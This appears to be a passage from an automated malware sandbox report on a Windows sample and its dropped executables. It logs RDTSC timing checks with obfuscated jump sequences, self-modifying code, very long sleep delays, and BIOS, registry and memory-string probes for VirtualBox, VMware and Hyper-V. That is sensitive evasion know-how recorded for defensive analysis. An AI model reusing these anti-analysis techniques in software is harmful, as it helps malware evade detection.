Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 508019D second address: 50801A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50801A1 second address: 50801A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50801A5 second address: 50801E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+10h] 0x0000000b jmp 00007FB7D50A5EE7h 0x00000010 xchg eax, esi 0x00000011 jmp 00007FB7D50A5EE6h 0x00000016 push eax 0x00000017 pushad 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50801E3 second address: 5080291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007FB7D509B853h 0x0000000b or esi, 50CB243Eh 0x00000011 jmp 00007FB7D509B859h 0x00000016 popfd 0x00000017 popad 0x00000018 xchg eax, esi 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FB7D509B84Ch 0x00000020 adc si, 3938h 0x00000025 jmp 00007FB7D509B84Bh 0x0000002a popfd 0x0000002b mov edi, eax 0x0000002d popad 0x0000002e mov esi, dword ptr [ebp+08h] 0x00000031 jmp 00007FB7D509B852h 0x00000036 xchg eax, edi 0x00000037 jmp 00007FB7D509B850h 0x0000003c push eax 0x0000003d jmp 00007FB7D509B84Bh 0x00000042 xchg eax, edi 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 mov eax, edx 0x00000048 call 00007FB7D509B857h 0x0000004d pop eax 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5080291 second address: 50802AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D50A5EE5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50802AA second address: 50802AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50802AE second address: 5080305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007FB7D50A5EDDh 0x0000000f je 00007FB846F54226h 0x00000015 jmp 00007FB7D50A5EDEh 0x0000001a cmp dword ptr [esi+08h], DDEEDDEEh 0x00000021 pushad 0x00000022 push esi 0x00000023 mov bx, EE00h 0x00000027 pop ebx 0x00000028 mov eax, 5E9C4CF5h 0x0000002d popad 0x0000002e je 00007FB846F54214h 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 call 00007FB7D50A5EDDh 0x0000003c pop esi 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5080305 second address: 508030B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 508030B second address: 508030F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 508030F second address: 508035C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [esi+44h] 0x0000000b pushad 0x0000000c mov si, bx 0x0000000f call 00007FB7D509B84Dh 0x00000014 pushfd 0x00000015 jmp 00007FB7D509B850h 0x0000001a adc si, 01D8h 0x0000001f jmp 00007FB7D509B84Bh 0x00000024 popfd 0x00000025 pop ecx 0x00000026 popad 0x00000027 or edx, dword ptr [ebp+0Ch] 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov ebx, ecx 0x0000002f mov si, D023h 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 508035C second address: 5080387 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 movsx ebx, si 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5080387 second address: 508038C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 508038C second address: 5080392 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5080392 second address: 5080414 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FB846F49B34h 0x0000000e jmp 00007FB7D509B859h 0x00000013 test byte ptr [esi+48h], 00000001h 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FB7D509B84Ch 0x0000001e sbb cx, 8828h 0x00000023 jmp 00007FB7D509B84Bh 0x00000028 popfd 0x00000029 pushfd 0x0000002a jmp 00007FB7D509B858h 0x0000002f adc ecx, 13DA3A88h 0x00000035 jmp 00007FB7D509B84Bh 0x0000003a popfd 0x0000003b popad 0x0000003c jne 00007FB846F49ADFh 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5080414 second address: 5080418 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5080418 second address: 508041E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 508041E second address: 5080424 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5080424 second address: 5080428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5070890 second address: 50708D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FB7D50A5EE1h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FB7D50A5EDEh 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a mov al, 62h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50708D5 second address: 507094D instructions: 0x00000000 rdtsc 0x00000002 call 00007FB7D509B859h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b movsx edx, ax 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 popad 0x00000012 and esp, FFFFFFF8h 0x00000015 pushad 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FB7D509B850h 0x0000001d adc ch, FFFFFFD8h 0x00000020 jmp 00007FB7D509B84Bh 0x00000025 popfd 0x00000026 call 00007FB7D509B858h 0x0000002b pop eax 0x0000002c popad 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FB7D509B851h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 507094D second address: 5070974 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 jmp 00007FB7D50A5EDCh 0x0000000d push eax 0x0000000e jmp 00007FB7D50A5EDBh 0x00000013 xchg eax, ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5070974 second address: 5070978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5070978 second address: 5070993 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5070993 second address: 50709AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D509B854h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50709AB second address: 5070A3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007FB7D50A5EE6h 0x00000011 push eax 0x00000012 pushad 0x00000013 call 00007FB7D50A5EE1h 0x00000018 jmp 00007FB7D50A5EE0h 0x0000001d pop ecx 0x0000001e pushfd 0x0000001f jmp 00007FB7D50A5EDBh 0x00000024 and cx, E22Eh 0x00000029 jmp 00007FB7D50A5EE9h 0x0000002e popfd 0x0000002f popad 0x00000030 xchg eax, esi 0x00000031 pushad 0x00000032 mov ebx, ecx 0x00000034 pushad 0x00000035 popad 0x00000036 popad 0x00000037 mov esi, dword ptr [ebp+08h] 0x0000003a pushad 0x0000003b movzx eax, dx 0x0000003e mov bh, B3h 0x00000040 popad 0x00000041 sub ebx, ebx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5070A3C second address: 5070A40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5070A40 second address: 5070A46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5070A46 second address: 5070A6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 2Bh 0x00000005 mov esi, 41B3B523h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test esi, esi 0x0000000f pushad 0x00000010 movzx ecx, dx 0x00000013 call 00007FB7D509B851h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5070A6C second address: 5070A7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 je 00007FB846F5B7F2h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5070A7E second address: 5070A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5070A82 second address: 5070A98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5070A98 second address: 5070A9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5070A9E second address: 5070AF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000012 jmp 00007FB7D50A5EDEh 0x00000017 mov ecx, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FB7D50A5EDDh 0x00000022 sbb ax, 7696h 0x00000027 jmp 00007FB7D50A5EE1h 0x0000002c popfd 0x0000002d movzx esi, bx 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5070AF4 second address: 5070AFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5070AFA second address: 5070AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5070AFE second address: 5070BB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B854h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FB846F510D1h 0x00000011 jmp 00007FB7D509B850h 0x00000016 test byte ptr [76FB6968h], 00000002h 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FB7D509B84Eh 0x00000024 sbb ax, 1048h 0x00000029 jmp 00007FB7D509B84Bh 0x0000002e popfd 0x0000002f push esi 0x00000030 mov ax, dx 0x00000033 pop ebx 0x00000034 popad 0x00000035 jne 00007FB846F510A0h 0x0000003b pushad 0x0000003c pushfd 0x0000003d jmp 00007FB7D509B84Ch 0x00000042 sbb ecx, 3F7052A8h 0x00000048 jmp 00007FB7D509B84Bh 0x0000004d popfd 0x0000004e jmp 00007FB7D509B858h 0x00000053 popad 0x00000054 mov edx, dword ptr [ebp+0Ch] 0x00000057 jmp 00007FB7D509B850h 0x0000005c xchg eax, ebx 0x0000005d pushad 0x0000005e mov cx, 644Dh 0x00000062 push eax 0x00000063 push edx 0x00000064 mov ebx, esi 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 76EAAE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 920D62 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 9A9F08 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 74EAAE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 900D62 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 989F08 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Special instruction interceptor: First address: 65AC40 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Special instruction interceptor: First address: 65AB58 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Special instruction interceptor: First address: 658196 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Special instruction interceptor: First address: 808C32 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Special instruction interceptor: First address: 6E5E08 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Special instruction interceptor: First address: 50FC4C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Special instruction interceptor: First address: 74783E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Special instruction interceptor: First address: 3ADC0C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Special instruction interceptor: First address: 54BEA5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Special instruction interceptor: First address: 5583C2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Special instruction interceptor: First address: 5E4435 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Special instruction interceptor: First address: 63DDC0C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Special instruction interceptor: First address: 657BEA5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Special instruction interceptor: First address: 3B0E4E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Special instruction interceptor: First address: 65883C2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Special instruction interceptor: First address: 6614435 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Special instruction interceptor: First address: 176E113 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Special instruction interceptor: First address: 15C53B2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Special instruction interceptor: First address: 17935F2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Special instruction interceptor: First address: 177E55E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Special instruction interceptor: First address: 17F43E0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Memory allocated: 1540000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Memory allocated: 2FE0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Memory allocated: 4FE0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory allocated: 6E20000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory allocated: 6FF0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory allocated: 8FF0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Memory allocated: 5150000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Memory allocated: 5470000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Memory allocated: 7470000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_050F0D2C rdtsc 0_2_050F0D2C
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 894
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1047
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1030
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1034
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 364
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1048
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6036 Thread sleep time: -36018s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3992 Thread sleep count: 894 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3992 Thread sleep time: -1788894s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1012 Thread sleep count: 1047 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1012 Thread sleep time: -2095047s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5856 Thread sleep count: 294 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5856 Thread sleep time: -8820000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3852 Thread sleep count: 1030 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3852 Thread sleep time: -2061030s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3512 Thread sleep count: 1034 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3512 Thread sleep time: -2069034s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6112 Thread sleep count: 364 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6112 Thread sleep time: -728364s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4412 Thread sleep count: 1048 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4412 Thread sleep time: -2097048s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe TID: 4420 Thread sleep time: -44022s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe TID: 5304 Thread sleep time: -44022s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe TID: 7788 Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe TID: 7680 Thread sleep time: -36018s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe TID: 7692 Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe TID: 3844 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Thread delayed: delay time: 922337203685477
Source: skotes.exe, skotes.exe, 00000006.00000002.2943303939.00000000008DB000.00000040.00000001.01000000.00000007.sdmp, a6f0d09f38.exe, a6f0d09f38.exe, 0000000D.00000002.2942271609.00000000007E2000.00000040.00000001.01000000.0000000E.sdmp, a6f0d09f38.exe, 0000000D.00000002.2987765650.000000000655D000.00000040.00000800.00020000.00000000.sdmp, b5da647ae3.exe, b5da647ae3.exe, 0000000E.00000002.2641791818.000000000069B000.00000040.00000001.01000000.0000000F.sdmp, 8b82d73f70.exe, 00000020.00000002.2916077534.000000000052D000.00000040.00000001.01000000.0000001A.sdmp, 98a7b9f337.exe, 00000022.00000002.2962320417.000000000174F000.00000040.00000001.01000000.0000001B.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: firefox.exe, 0000001F.00000002.2966859320.000001D14EE60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
Source: firefox.exe, 0000001E.00000002.2955897457.000001C8C37BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW "
Source: 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW"z
Source: a6f0d09f38.exe, 0000000D.00000003.2901005763.0000000001258000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000002.2958708829.0000000001258000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWO
Source: firefox.exe, 0000001F.00000002.2966859320.000001D14EE60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
Source: firefox.exe, 0000001E.00000002.2969252041.000001C8C3D00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllP
Source: firefox.exe, 0000001F.00000002.2950099066.000001D14E63A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
Source: SxQyhJr.exe, 00000007.00000002.2431381161.0000000003059000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000002.2956647338.000000000122A000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2901005763.0000000001258000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000002.2958708829.0000000001258000.00000004.00000020.00020000.00000000.sdmp, b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000ED3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2980852938.000001DEE03BB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2969252041.000001C8C3D00000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2966859320.000001D14EE60000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2952438162.000001729E3AA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: firefox.exe, 00000021.00000002.2953748546.000001729E3E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW]gha
Source: firefox.exe, 0000001C.00000002.2997922183.000001DEEA4BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2967474510.000001C8C3C1B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: skotes.exe, 00000006.00000002.2957851747.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH
